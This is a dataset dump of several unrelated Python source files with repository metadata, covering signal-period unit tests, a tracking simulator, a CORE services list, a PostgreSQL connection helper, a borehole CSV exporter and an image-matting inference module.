        hybrid_ipdft_autocorr_stats, hybrid_periods = hybrid(
            self.sig, llim=None, ulim=50, return_all=True
        )
        self.assertEqual(hybrid_ipdft_autocorr_stats[0], hybrid_x)
        self.assertEqual(hybrid_ipdft_autocorr_stats[1], ipdft_pwr)
        self.assertEqual(hybrid_ipdft_autocorr_stats[2], auto_x)
        # Same check restricted to a single period (llim == ulim).
        ipdft_pwr, ipdft_prd = ipdft(self.sig, llim=10, ulim=10)
        auto_x, auto_periods = auto_corr(self.sig, llim=10, ulim=10)
        hybrid_x, hybrid_periods = hybrid(self.sig, llim=10, ulim=10)
        hybrid_ipdft_autocorr_stats, hybrid_periods = hybrid(
            self.sig, llim=10, ulim=10, return_all=True
        )
        self.assertEqual(hybrid_ipdft_autocorr_stats[0], hybrid_x)
        self.assertEqual(hybrid_ipdft_autocorr_stats[1], ipdft_pwr)
        self.assertEqual(hybrid_ipdft_autocorr_stats[2], auto_x)
if __name__ == "__main__":
main()
| 32.135359 | 79 | 0.458265 | from numpy import arange, array, convolve, exp, float64, pi, random, sin, zeros
from cogent3.maths.period import _autocorr_inner2 as py_autocorr_inner
from cogent3.maths.period import _goertzel_inner as py_goertzel_inner
from cogent3.maths.period import _ipdft_inner2 as py_ipdft_inner
from cogent3.maths.period import auto_corr, dft, goertzel, hybrid, ipdft
from cogent3.maths.period_numba import autocorr_inner as numba_autocorr_inner
from cogent3.maths.period_numba import goertzel_inner as numba_goertzel_inner
from cogent3.maths.period_numba import ipdft_inner as numba_ipdft_inner
from cogent3.util.unit_test import TestCase, main
__author__ = "Hua Ying, Julien Epps and Gavin Huttley"
__copyright__ = "Copyright 2007-2020, The Cogent Project"
__credits__ = ["Julien Epps", "Hua Ying", "Gavin Huttley"]
__license__ = "BSD-3"
__version__ = "2020.2.7a"
__maintainer__ = "Gavin Huttley"
__email__ = "Gavin.Huttley@anu.edu.au"
__status__ = "Production"
class TestPeriod(TestCase):
def setUp(self):
t = arange(0, 10, 0.1)
n = random.randn(len(t))
nse = convolve(n, exp(-t / 0.05)) * 0.1
nse = nse[: len(t)]
self.sig = sin(2 * pi * t) + nse
self.p = 10
def test_inner_funcs(self):
x = array(
[
0.04874203,
0.56831373,
0.94267804,
0.95664485,
0.60719478,
-0.09037356,
-0.69897319,
-1.11239811,
-0.84127485,
-0.56281126,
0.02301213,
0.56250284,
1.0258557,
1.03906527,
0.69885916,
0.10103556,
-0.43248024,
-1.03160503,
-0.84901545,
-0.84934356,
0.00323728,
0.44344594,
0.97736748,
1.01635433,
0.38538423,
0.09869918,
-0.60441861,
-0.90175391,
-1.00166887,
-0.66303249,
-0.02070569,
0.76520328,
0.93462426,
0.97011673,
0.63199999,
0.0764678,
-0.55680168,
-0.92028808,
-0.98481451,
-0.57600588,
0.0482667,
0.57572519,
1.02077883,
0.93271663,
0.41581696,
-0.07639671,
-0.71426286,
-0.97730119,
-1.0370596,
-0.67919572,
0.03779302,
0.60408759,
0.87826068,
0.79126442,
0.69769622,
0.01419442,
-0.42917556,
-1.00100485,
-0.83945546,
-0.55746313,
0.12730859,
0.60057659,
0.98059721,
0.83275501,
0.69031804,
0.02277554,
-0.63982729,
-1.23680355,
-0.79477887,
-0.67773375,
-0.05204714,
0.51765381,
0.77691955,
0.8996709,
0.5153137,
0.01840839,
-0.65124866,
-1.13269058,
-0.92342177,
-0.45673709,
0.11212881,
0.50153941,
1.09329507,
0.96457193,
0.80271578,
-0.0041043,
-0.81750772,
-0.99259986,
-0.92343788,
-0.57694955,
0.13982059,
0.56653375,
0.82217563,
0.85162513,
0.3984116,
-0.18937514,
-0.65304629,
-1.0067146,
-1.0037422,
-0.68011283,
]
)
N = 100
period = 10
self.assertFloatEqual(
py_goertzel_inner(x, N, period), numba_goertzel_inner(x, N, period)
)
ulim = 8
N = 8
x = array([0.0, 1.0, 0.0, -1.0, 0.0, 1.0, 0.0, -1.0])
X = zeros(8, dtype="complex128")
W = array(
[
1.00000000e00 + 2.44929360e-16j,
-1.00000000e00 - 1.22464680e-16j,
-5.00000000e-01 - 8.66025404e-01j,
6.12323400e-17 - 1.00000000e00j,
3.09016994e-01 - 9.51056516e-01j,
5.00000000e-01 - 8.66025404e-01j,
6.23489802e-01 - 7.81831482e-01j,
7.07106781e-01 - 7.07106781e-01j,
]
)
py_result = py_ipdft_inner(x, X, W, ulim, N)
numba_result = numba_ipdft_inner(x, X, W, ulim, N)
for i, j in zip(py_result, numba_result):
self.assertFloatEqual(abs(i), abs(j))
x = array(
[
-0.07827614,
0.56637551,
1.01320526,
1.01536245,
0.63548361,
0.08560101,
-0.46094955,
-0.78065656,
-0.8893556,
-0.56514145,
0.02325272,
0.63660719,
0.86291302,
0.82953598,
0.5706848,
0.11655242,
-0.6472655,
-0.86178218,
-0.96495057,
-0.76098445,
-0.18911517,
0.59280646,
1.00248693,
0.89241423,
0.52475111,
-0.01620599,
-0.60199278,
-0.98279829,
-1.12469771,
-0.61355799,
0.04321191,
0.52784788,
0.68508784,
0.86015123,
0.66825756,
-0.0802846,
-0.63626753,
-0.93023345,
-0.99129547,
-0.46891033,
0.04145813,
0.71226518,
1.01499246,
0.94726778,
0.63598143,
-0.21920589,
-0.48071702,
-0.86041579,
-0.9046141,
-0.55714746,
-0.10052384,
0.69708969,
1.02575789,
1.16524031,
0.49895282,
-0.13068573,
-0.45770419,
-0.86155787,
-0.9230734,
-0.6590525,
-0.05072955,
0.52380317,
1.02674335,
0.87778499,
0.4303284,
-0.01855665,
-0.62858193,
-0.93954774,
-0.94257301,
-0.49692951,
0.00699347,
0.69049074,
0.93906549,
1.06339809,
0.69337543,
0.00252569,
-0.57825881,
-0.88460603,
-0.99259672,
-0.73535697,
0.12064751,
0.91159174,
0.88966993,
1.02159917,
0.43479926,
-0.06159005,
-0.61782651,
-0.95284676,
-0.8218889,
-0.52166419,
0.021961,
0.52268762,
0.79428288,
1.01642697,
0.49060377,
-0.02183994,
-0.52743836,
-0.99363909,
-1.02963821,
-0.64249996,
]
)
py_xc = zeros(2 * len(x) - 1, dtype=float64)
numba_xc = py_xc.copy()
N = 100
py_autocorr_inner(x, py_xc, N)
numba_autocorr_inner(x, numba_xc, N)
for i, j in zip(py_xc, numba_xc):
self.assertFloatEqual(i, j)
def test_autocorr(self):
s = [1, 1, 1, 1]
X, periods = auto_corr(s, llim=-3, ulim=None)
exp_X = array([1, 2, 3, 4, 3, 2, 1], dtype=float)
self.assertEqual(X, exp_X)
auto_x, auto_periods = auto_corr(self.sig, llim=2, ulim=50)
max_idx = list(auto_x).index(max(auto_x))
auto_p = auto_periods[max_idx]
self.assertEqual(auto_p, self.p)
def test_dft(self):
dft_x, dft_periods = dft(self.sig)
dft_x = abs(dft_x)
max_idx = list(dft_x).index(max(dft_x))
dft_p = dft_periods[max_idx]
self.assertEqual(int(dft_p), self.p)
def test_ipdft(self):
s = [0, 1, 0, -1, 0, 1, 0, -1]
X, periods = ipdft(s, llim=1, ulim=len(s))
exp_X = abs(
array(
[
0,
0,
-1.5 + 0.866j,
-4j,
2.927 - 0.951j,
1.5 + 0.866j,
0.302 + 0.627j,
0,
]
)
)
X = abs(X)
self.assertFloatEqual(X, exp_X, eps=1e-3)
ipdft_x, ipdft_periods = ipdft(self.sig, llim=2, ulim=50)
ipdft_x = abs(ipdft_x)
max_idx = list(ipdft_x).index(max(ipdft_x))
ipdft_p = ipdft_periods[max_idx]
self.assertEqual(ipdft_p, self.p)
def test_goertzel(self):
ipdft_pwr, ipdft_prd = ipdft(self.sig, llim=10, ulim=10)
self.assertFloatEqual(goertzel(self.sig, 10), ipdft_pwr)
def test_hybrid(self):
hybrid_x, hybrid_periods = hybrid(self.sig, llim=None, ulim=50)
hybrid_x = abs(hybrid_x)
max_idx = list(hybrid_x).index(max(hybrid_x))
hybrid_p = hybrid_periods[max_idx]
self.assertEqual(hybrid_p, self.p)
def test_hybrid_returns_all(self):
ipdft_pwr, ipdft_prd = ipdft(self.sig, llim=2, ulim=50)
auto_x, auto_periods = auto_corr(self.sig, llim=2, ulim=50)
hybrid_x, hybrid_periods = hybrid(self.sig, llim=None, ulim=50)
hybrid_ipdft_autocorr_stats, hybrid_periods = hybrid(
self.sig, llim=None, ulim=50, return_all=True
)
self.assertEqual(hybrid_ipdft_autocorr_stats[0], hybrid_x)
self.assertEqual(hybrid_ipdft_autocorr_stats[1], ipdft_pwr)
self.assertEqual(hybrid_ipdft_autocorr_stats[2], auto_x)
ipdft_pwr, ipdft_prd = ipdft(self.sig, llim=10, ulim=10)
auto_x, auto_periods = auto_corr(self.sig, llim=10, ulim=10)
hybrid_x, hybrid_periods = hybrid(self.sig, llim=10, ulim=10)
hybrid_ipdft_autocorr_stats, hybrid_periods = hybrid(
self.sig, llim=10, ulim=10, return_all=True
)
self.assertEqual(hybrid_ipdft_autocorr_stats[0], hybrid_x)
self.assertEqual(hybrid_ipdft_autocorr_stats[1], ipdft_pwr)
self.assertEqual(hybrid_ipdft_autocorr_stats[2], auto_x)
if __name__ == "__main__":
main()
| true | true |
1c2ca72ba0a51bfb6047dce162693e6840c202cc | 1,589 | py | Python | stonesoup/simulator/platform.py | SohSalari/Stone-Soup | e073d4145df18facad43e4ab7b0a34e8d65f67ee | [
"MIT"
] | 1 | 2020-07-21T15:20:20.000Z | 2020-07-21T15:20:20.000Z | stonesoup/simulator/platform.py | mgomesborges/Stone-Soup | 39c7f02ce11e10c9b3c612ad359f6d8bca495266 | [
"MIT"
] | null | null | null | stonesoup/simulator/platform.py | mgomesborges/Stone-Soup | 39c7f02ce11e10c9b3c612ad359f6d8bca495266 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from ..base import Property
from ..reader import GroundTruthReader
from .base import DetectionSimulator
from ..buffered_generator import BufferedGenerator
from ..platform import Platform
class PlatformDetectionSimulator(DetectionSimulator):
"""A simple platform detection simulator.
Processes ground truth data and generates :class:`~.Detection` data
according to a list of platforms by calling each sensor in these platforms.
"""
groundtruth = Property(GroundTruthReader,
doc='Source of ground truth tracks used to generate'
' detections for.')
platforms = Property([Platform],
doc='List of platforms in :class:`~.Platform` to '
'generate sensor detections from.')
@BufferedGenerator.generator_method
def detections_gen(self):
for time, truths in self.groundtruth:
for platform in self.platforms:
platform.move(time)
for platform in self.platforms:
for sensor in platform.sensors:
detections = set()
for truth in truths.union(self.platforms):
# Make sure platform's sensors do not measure itself
if truth is platform:
continue
detection = sensor.measure(truth)
if detection is not None:
detections.add(detection)
yield time, detections
| 37.833333 | 79 | 0.582127 |
from ..base import Property
from ..reader import GroundTruthReader
from .base import DetectionSimulator
from ..buffered_generator import BufferedGenerator
from ..platform import Platform
class PlatformDetectionSimulator(DetectionSimulator):
groundtruth = Property(GroundTruthReader,
doc='Source of ground truth tracks used to generate'
' detections for.')
platforms = Property([Platform],
doc='List of platforms in :class:`~.Platform` to '
'generate sensor detections from.')
@BufferedGenerator.generator_method
def detections_gen(self):
for time, truths in self.groundtruth:
for platform in self.platforms:
platform.move(time)
for platform in self.platforms:
for sensor in platform.sensors:
detections = set()
for truth in truths.union(self.platforms):
if truth is platform:
continue
detection = sensor.measure(truth)
if detection is not None:
detections.add(detection)
yield time, detections
| true | true |
1c2ca80e2a0454be3248cf10b328f2d2d86dfa74 | 420 | py | Python | Lab_6/data/core/myservices/__init__.py | Opty1337/CN | bc01cf39bcc017783fdbb84ebd7958f405511e6c | [
"MIT"
] | null | null | null | Lab_6/data/core/myservices/__init__.py | Opty1337/CN | bc01cf39bcc017783fdbb84ebd7958f405511e6c | [
"MIT"
] | null | null | null | Lab_6/data/core/myservices/__init__.py | Opty1337/CN | bc01cf39bcc017783fdbb84ebd7958f405511e6c | [
"MIT"
] | null | null | null | """myservices
Custom services that you define can be put in this directory. Everything
listed in __all__ is automatically loaded when you add this directory to the
custom_services_dir = '/full/path/to/here' core.conf file option.
"""
__all__ = ["trafficdump", "pcpingweb01", "linkadsl_u128k", "linkadsl_u256k", "linkadsl_u512k", "linkadsl_u768k", "linkadsl_u1024k", "linkbw4g_u5800k", "linkcable_u8000k", "simplenat"]
| 52.5 | 183 | 0.77381 | __all__ = ["trafficdump", "pcpingweb01", "linkadsl_u128k", "linkadsl_u256k", "linkadsl_u512k", "linkadsl_u768k", "linkadsl_u1024k", "linkbw4g_u5800k", "linkcable_u8000k", "simplenat"]
| true | true |
1c2ca9762c3d53a7dac08a120f7e7e60f5b4c3d4 | 1,783 | py | Python | ejercicios_basicos/trabajo_bd/capa_datos/conexion.py | JuanDuran85/ejemplos_python | 47aa49c65384ab89654f362f3da6cd2b0ef386e5 | [
"Apache-2.0"
] | null | null | null | ejercicios_basicos/trabajo_bd/capa_datos/conexion.py | JuanDuran85/ejemplos_python | 47aa49c65384ab89654f362f3da6cd2b0ef386e5 | [
"Apache-2.0"
] | null | null | null | ejercicios_basicos/trabajo_bd/capa_datos/conexion.py | JuanDuran85/ejemplos_python | 47aa49c65384ab89654f362f3da6cd2b0ef386e5 | [
"Apache-2.0"
] | null | null | null | import os
from dotenv import load_dotenv
import psycopg2 as db
from logger_base import log
import sys
load_dotenv()
class Conexion:
__DATABASE = os.getenv("DATABASE")
__USER = os.getenv("USER")
__PASSWORD = os.getenv("PASSWORD")
__HOST = os.getenv("HOST")
__PORT = os.getenv("PORT")
__conexion = None
__cursor = None
@classmethod
def obtener_conexion(cls):
if cls.__conexion is None:
try:
cls.__conexion = db.connect(
database=cls.__DATABASE,
user=cls.__USER,
password=cls.__PASSWORD,
host=cls.__HOST,
port=cls.__PORT
)
log.debug("Conexión establecida")
return cls.__conexion
except Exception as e:
log.error("Ocurrio un error en la conexion: {}".format(e))
sys.exit(1)
else:
return cls.__conexion
@classmethod
def obtener_cursor(cls):
if cls.__cursor is None or cls.__conexion:
try:
cls.__cursor = cls.obtener_conexion().cursor()
log.debug("Cursor establecido: {}".format(cls.__cursor))
return cls.__cursor
except Exception as e:
log.error("Ocurrio un error en el cursor: {}".format(e))
sys.exit(1)
else:
return cls.__cursor
@classmethod
def cerrar(cls):
cls.__cursor.close()
cls.__conexion.close()
if __name__ == '__main__':
conexion = Conexion.obtener_conexion()
cursor = Conexion.obtener_cursor()
cursor.execute("SELECT * FROM persona")
print(cursor.fetchall())
Conexion.cerrar() | 28.758065 | 74 | 0.55244 | import os
from dotenv import load_dotenv
import psycopg2 as db
from logger_base import log
import sys
load_dotenv()
class Conexion:
__DATABASE = os.getenv("DATABASE")
__USER = os.getenv("USER")
__PASSWORD = os.getenv("PASSWORD")
__HOST = os.getenv("HOST")
__PORT = os.getenv("PORT")
__conexion = None
__cursor = None
@classmethod
def obtener_conexion(cls):
if cls.__conexion is None:
try:
cls.__conexion = db.connect(
database=cls.__DATABASE,
user=cls.__USER,
password=cls.__PASSWORD,
host=cls.__HOST,
port=cls.__PORT
)
log.debug("Conexión establecida")
return cls.__conexion
except Exception as e:
log.error("Ocurrio un error en la conexion: {}".format(e))
sys.exit(1)
else:
return cls.__conexion
@classmethod
def obtener_cursor(cls):
if cls.__cursor is None or cls.__conexion:
try:
cls.__cursor = cls.obtener_conexion().cursor()
log.debug("Cursor establecido: {}".format(cls.__cursor))
return cls.__cursor
except Exception as e:
log.error("Ocurrio un error en el cursor: {}".format(e))
sys.exit(1)
else:
return cls.__cursor
@classmethod
def cerrar(cls):
cls.__cursor.close()
cls.__conexion.close()
if __name__ == '__main__':
conexion = Conexion.obtener_conexion()
cursor = Conexion.obtener_cursor()
cursor.execute("SELECT * FROM persona")
print(cursor.fetchall())
Conexion.cerrar() | true | true |
1c2cabc15b13e8b192fbcc58d43bd1df785b5832 | 2,542 | py | Python | xsboringen/scripts/write_csv.py | TheFrett/xsboringen | 92283809ca5dcf03dac661720a683a90dc2ff9f7 | [
"MIT"
] | null | null | null | xsboringen/scripts/write_csv.py | TheFrett/xsboringen | 92283809ca5dcf03dac661720a683a90dc2ff9f7 | [
"MIT"
] | null | null | null | xsboringen/scripts/write_csv.py | TheFrett/xsboringen | 92283809ca5dcf03dac661720a683a90dc2ff9f7 | [
"MIT"
] | null | null | null | #! /usr/bin/env python
# -*- coding: utf-8 -*-
# Tom van Steijn, Royal HaskoningDHV
# Erik van Onselen, Deltares
from xsboringen.calc import SandmedianClassifier, AdmixClassifier, LithologyClassifier
from xsboringen.csvfiles import boreholes_to_csv
from xsboringen.datasources import boreholes_from_sources
import logging
import os
from pathlib import Path
log = logging.getLogger(os.path.basename(__file__))
def write_csv(**kwargs):
# args
datasources = kwargs['datasources']
result = kwargs['result']
config = kwargs['config']
# read boreholes and CPT's from data folders
admixclassifier = AdmixClassifier(
config['admix_fieldnames']
)
borehole_sources = datasources.get('boreholes') or []
boreholes = boreholes_from_sources(borehole_sources, admixclassifier)
# translate CPT to lithology if needed
if result.get('translate_cpt', False):
ruletype = result.get('cpt_classifier') or 'isbt'
table = config['cpt_classification']
lithologyclassifier = LithologyClassifier(table, ruletype=ruletype)
boreholes = (
b.to_lithology(lithologyclassifier, admixclassifier)
for b in boreholes
)
# classify sandmedian if needed
if result.get('classify_sandmedian', False):
bins = config['sandmedianbins']
sandmedianclassifier = SandmedianClassifier(bins)
boreholes = (
b.update_sandmedianclass(sandmedianclassifier) for b in boreholes
)
# simplify if needed
if result.get('simplify'):
min_thickness = result.get('min_thickness')
simplify_by = result.get('simplify_by') or config['simplify_by']
if not isinstance(simplify_by, list):
simplify_by = [simplify_by,]
by = lambda s: {a: getattr(s, a) for a in simplify_by}
boreholes = (
b.simplified(min_thickness=min_thickness, by=by) if b.format in result.get('simplify')
else b
for b in boreholes
)
# write output to csv
# extra_fields = result.get('extra_fields') or {}
# extra_fields = {k: tuple(v) for k, v in extra_fields.items()}
# boreholes_to_csv(boreholes, result['csvfile'],
# extra_fields=extra_fields,
# )
# write output to pickle
if result.get('save_pickle', False):
import pickle
#iets = [b for b in boreholes]
f = open(Path(result['csvfile']).parent.joinpath('boreholes.p'), 'wb')
pickle.dump([b for b in boreholes], f)
| 33.012987 | 99 | 0.659717 |
from xsboringen.calc import SandmedianClassifier, AdmixClassifier, LithologyClassifier
from xsboringen.csvfiles import boreholes_to_csv
from xsboringen.datasources import boreholes_from_sources
import logging
import os
from pathlib import Path
log = logging.getLogger(os.path.basename(__file__))
def write_csv(**kwargs):
datasources = kwargs['datasources']
result = kwargs['result']
config = kwargs['config']
admixclassifier = AdmixClassifier(
config['admix_fieldnames']
)
borehole_sources = datasources.get('boreholes') or []
boreholes = boreholes_from_sources(borehole_sources, admixclassifier)
# translate CPT to lithology if needed
if result.get('translate_cpt', False):
ruletype = result.get('cpt_classifier') or 'isbt'
table = config['cpt_classification']
lithologyclassifier = LithologyClassifier(table, ruletype=ruletype)
boreholes = (
b.to_lithology(lithologyclassifier, admixclassifier)
for b in boreholes
)
# classify sandmedian if needed
if result.get('classify_sandmedian', False):
bins = config['sandmedianbins']
sandmedianclassifier = SandmedianClassifier(bins)
boreholes = (
b.update_sandmedianclass(sandmedianclassifier) for b in boreholes
)
# simplify if needed
if result.get('simplify'):
min_thickness = result.get('min_thickness')
simplify_by = result.get('simplify_by') or config['simplify_by']
if not isinstance(simplify_by, list):
simplify_by = [simplify_by,]
by = lambda s: {a: getattr(s, a) for a in simplify_by}
boreholes = (
b.simplified(min_thickness=min_thickness, by=by) if b.format in result.get('simplify')
else b
for b in boreholes
)
# write output to csv
# extra_fields = result.get('extra_fields') or {}
# extra_fields = {k: tuple(v) for k, v in extra_fields.items()}
# boreholes_to_csv(boreholes, result['csvfile'],
# extra_fields=extra_fields,
# )
# write output to pickle
if result.get('save_pickle', False):
import pickle
#iets = [b for b in boreholes]
f = open(Path(result['csvfile']).parent.joinpath('boreholes.p'), 'wb')
pickle.dump([b for b in boreholes], f)
| true | true |
1c2caeae83a815434c4484e3d791719568404912 | 899 | py | Python | UserPage/migrations/0006_blog.py | MidnightMadne33/Image-Blog | 8d47f2c52edb28bda5c6920c4b6e5bd1f6f2a9a0 | [
"CC0-1.0"
] | null | null | null | UserPage/migrations/0006_blog.py | MidnightMadne33/Image-Blog | 8d47f2c52edb28bda5c6920c4b6e5bd1f6f2a9a0 | [
"CC0-1.0"
] | null | null | null | UserPage/migrations/0006_blog.py | MidnightMadne33/Image-Blog | 8d47f2c52edb28bda5c6920c4b6e5bd1f6f2a9a0 | [
"CC0-1.0"
] | null | null | null | # Generated by Django 2.1.7 on 2019-02-27 12:55
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('UserPage', '0005_userprofile'),
]
operations = [
migrations.CreateModel(
name='Blog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('TextContent', models.TextField()),
('ImageContent', models.ImageField(upload_to='UserMedia/User')),
('Date', models.DateField(auto_now_add=True)),
('username', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| 33.296296 | 122 | 0.628476 |
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('UserPage', '0005_userprofile'),
]
operations = [
migrations.CreateModel(
name='Blog',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('TextContent', models.TextField()),
('ImageContent', models.ImageField(upload_to='UserMedia/User')),
('Date', models.DateField(auto_now_add=True)),
('username', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
| true | true |
1c2caf06b51d860afd23f610a0fe74e12a962b13 | 1,818 | py | Python | tests/db_functions/test_pad.py | shinshin86/django | 5cc81cd9eb69f5f7a711412c02039b435c393135 | [
"PSF-2.0",
"BSD-3-Clause"
] | 2 | 2020-11-04T06:26:42.000Z | 2021-01-17T19:29:52.000Z | tests/db_functions/test_pad.py | Blaahborgh/django | c591bc3ccece1514d6b419826c7fa36ada9d9213 | [
"PSF-2.0",
"BSD-3-Clause"
] | 55 | 2016-02-27T06:02:24.000Z | 2021-11-01T07:53:20.000Z | tests/db_functions/test_pad.py | Blaahborgh/django | c591bc3ccece1514d6b419826c7fa36ada9d9213 | [
"PSF-2.0",
"BSD-3-Clause"
] | 1 | 2018-12-10T03:06:36.000Z | 2018-12-10T03:06:36.000Z | from django.db.models import CharField, Value
from django.db.models.functions import Length, LPad, RPad
from django.test import TestCase
from .models import Author
class PadTests(TestCase):
def test_pad(self):
Author.objects.create(name='John', alias='j')
tests = (
(LPad('name', 7, Value('xy')), 'xyxJohn'),
(RPad('name', 7, Value('xy')), 'Johnxyx'),
(LPad('name', 6, Value('x')), 'xxJohn'),
(RPad('name', 6, Value('x')), 'Johnxx'),
# The default pad string is a space.
(LPad('name', 6), ' John'),
(RPad('name', 6), 'John '),
# If string is longer than length it is truncated.
(LPad('name', 2), 'Jo'),
(RPad('name', 2), 'Jo'),
(LPad('name', 0), ''),
(RPad('name', 0), ''),
)
for function, padded_name in tests:
with self.subTest(function=function):
authors = Author.objects.annotate(padded_name=function)
self.assertQuerysetEqual(authors, [padded_name], lambda a: a.padded_name, ordered=False)
def test_pad_negative_length(self):
for function in (LPad, RPad):
with self.subTest(function=function):
with self.assertRaisesMessage(ValueError, "'length' must be greater or equal to 0."):
function('name', -1)
def test_combined_with_length(self):
Author.objects.create(name='Rhonda', alias='john_smith')
Author.objects.create(name='♥♣♠', alias='bytes')
authors = Author.objects.annotate(filled=LPad('name', Length('alias'), output_field=CharField()))
self.assertQuerysetEqual(
authors.order_by('alias'),
[' ♥♣♠', ' Rhonda'],
lambda a: a.filled,
)
| 40.4 | 105 | 0.558856 | from django.db.models import CharField, Value
from django.db.models.functions import Length, LPad, RPad
from django.test import TestCase
from .models import Author
class PadTests(TestCase):
def test_pad(self):
Author.objects.create(name='John', alias='j')
tests = (
(LPad('name', 7, Value('xy')), 'xyxJohn'),
(RPad('name', 7, Value('xy')), 'Johnxyx'),
(LPad('name', 6, Value('x')), 'xxJohn'),
(RPad('name', 6, Value('x')), 'Johnxx'),
(LPad('name', 6), ' John'),
(RPad('name', 6), 'John '),
(LPad('name', 2), 'Jo'),
(RPad('name', 2), 'Jo'),
(LPad('name', 0), ''),
(RPad('name', 0), ''),
)
for function, padded_name in tests:
with self.subTest(function=function):
authors = Author.objects.annotate(padded_name=function)
self.assertQuerysetEqual(authors, [padded_name], lambda a: a.padded_name, ordered=False)
def test_pad_negative_length(self):
for function in (LPad, RPad):
with self.subTest(function=function):
with self.assertRaisesMessage(ValueError, "'length' must be greater or equal to 0."):
function('name', -1)
def test_combined_with_length(self):
Author.objects.create(name='Rhonda', alias='john_smith')
Author.objects.create(name='♥♣♠', alias='bytes')
authors = Author.objects.annotate(filled=LPad('name', Length('alias'), output_field=CharField()))
self.assertQuerysetEqual(
authors.order_by('alias'),
[' ♥♣♠', ' Rhonda'],
lambda a: a.filled,
)
| true | true |
1c2cafa5f1cc4b99111eb6eeaa125eabbbaaeecd | 451 | py | Python | pyfmodex/studio/library.py | CDanSantana/pyfmodex | d820712a9a5203e2e2a2547e29f9e9a02f404282 | [
"MIT"
] | null | null | null | pyfmodex/studio/library.py | CDanSantana/pyfmodex | d820712a9a5203e2e2a2547e29f9e9a02f404282 | [
"MIT"
] | null | null | null | pyfmodex/studio/library.py | CDanSantana/pyfmodex | d820712a9a5203e2e2a2547e29f9e9a02f404282 | [
"MIT"
] | null | null | null | import os
import platform
from ctypes import cdll, windll
arch = platform.architecture()[0]
if os.name == 'nt':
library_type = windll
library_name = "fmodstudio"
elif os.name == "posix":
library_type = cdll
library_name = "libfmodstudio.so"
library = None
def get_library():
global library
if not library:
library = library_type.LoadLibrary(library_name)
return library | 25.055556 | 56 | 0.634146 | import os
import platform
from ctypes import cdll, windll
arch = platform.architecture()[0]
if os.name == 'nt':
library_type = windll
library_name = "fmodstudio"
elif os.name == "posix":
library_type = cdll
library_name = "libfmodstudio.so"
library = None
def get_library():
global library
if not library:
library = library_type.LoadLibrary(library_name)
return library | true | true |
1c2cafbe43b10c7240262483e1ca414130be2c4f | 8,586 | py | Python | mmedit/apis/matting_inference.py | wchstrife/mmediting | 2a90254b677cc505df0d36a182ae710188804221 | [
"Apache-2.0"
] | null | null | null | mmedit/apis/matting_inference.py | wchstrife/mmediting | 2a90254b677cc505df0d36a182ae710188804221 | [
"Apache-2.0"
] | null | null | null | mmedit/apis/matting_inference.py | wchstrife/mmediting | 2a90254b677cc505df0d36a182ae710188804221 | [
"Apache-2.0"
] | null | null | null | import mmcv
import torch
from mmcv.parallel import collate, scatter
from mmcv.runner import load_checkpoint
from mmedit.datasets.pipelines import Compose
from mmedit.models import build_model
def init_model(config, checkpoint=None, device='cuda:0'):
"""Initialize a model from config file.
Args:
config (str or :obj:`mmcv.Config`): Config file path or the config
object.
checkpoint (str, optional): Checkpoint path. If left as None, the model
will not load any weights.
device (str): Which device the model will deploy. Default: 'cuda:0'.
Returns:
nn.Module: The constructed model.
"""
if isinstance(config, str):
config = mmcv.Config.fromfile(config)
elif not isinstance(config, mmcv.Config):
raise TypeError('config must be a filename or Config object, '
f'but got {type(config)}')
config.model.pretrained = None
config.test_cfg.metrics = None
model = build_model(config.model, test_cfg=config.test_cfg)
if checkpoint is not None:
checkpoint = load_checkpoint(model, checkpoint)
model.cfg = config # save the config in the model for convenience
model.to(device)
model.eval()
return model
def matting_inference(model, img, trimap):
"""Inference image(s) with the model.
Args:
model (nn.Module): The loaded model.
img (str): Image file path.
trimap (str): Trimap file path.
Returns:
np.ndarray: The predicted alpha matte.
"""
cfg = model.cfg
device = next(model.parameters()).device # model device
# remove alpha from test_pipeline
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
# build the data pipeline
test_pipeline = Compose(cfg.test_pipeline)
# prepare data
data = dict(merged_path=img, trimap_path=trimap)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
# forward the model
with torch.no_grad():
result = model(test_mode=True, **data)
return result['pred_alpha']
def matting_inference_file(model, img, trimap=None, mask=None, image_path="input file directly"):
"""Inference image(s) with the model.
Args:
model (nn.Module): The loaded model.
img (str): Image file path.
trimap (str): Trimap file path.
Returns:
np.ndarray: The predicted alpha matte.
"""
assert trimap is not None or mask is not None
cfg = model.cfg
device = next(model.parameters()).device # model device
# remove alpha from test_pipeline
keys_to_remove = ['alpha', 'ori_alpha']
for key in keys_to_remove:
for pipeline in list(cfg.test_pipeline):
if 'key' in pipeline and key == pipeline['key']:
cfg.test_pipeline.remove(pipeline)
if 'keys' in pipeline and key in pipeline['keys']:
pipeline['keys'].remove(key)
if len(pipeline['keys']) == 0:
cfg.test_pipeline.remove(pipeline)
if 'meta_keys' in pipeline and key in pipeline['meta_keys']:
pipeline['meta_keys'].remove(key)
# build the data pipeline
test_pipeline = cfg.test_pipeline[2:]
test_pipeline = Compose(test_pipeline)
# prepare data
data = dict(merged=img, mask=mask, ori_mask=mask,
trimap=trimap, ori_trimap=trimap, ori_merged=img.copy(),
merged_path=image_path, merged_ori_shape=img.shape)
data = test_pipeline(data)
data = scatter(collate([data], samples_per_gpu=1), [device])[0]
# forward the model
with torch.no_grad():
result = model(test_mode=True, **data)
return result
def fba_inference_seg(model, img, trimap, image_path="input file directly"):
"""Inference image(s) with the model.
Args:
model (nn.Module): The loaded model.
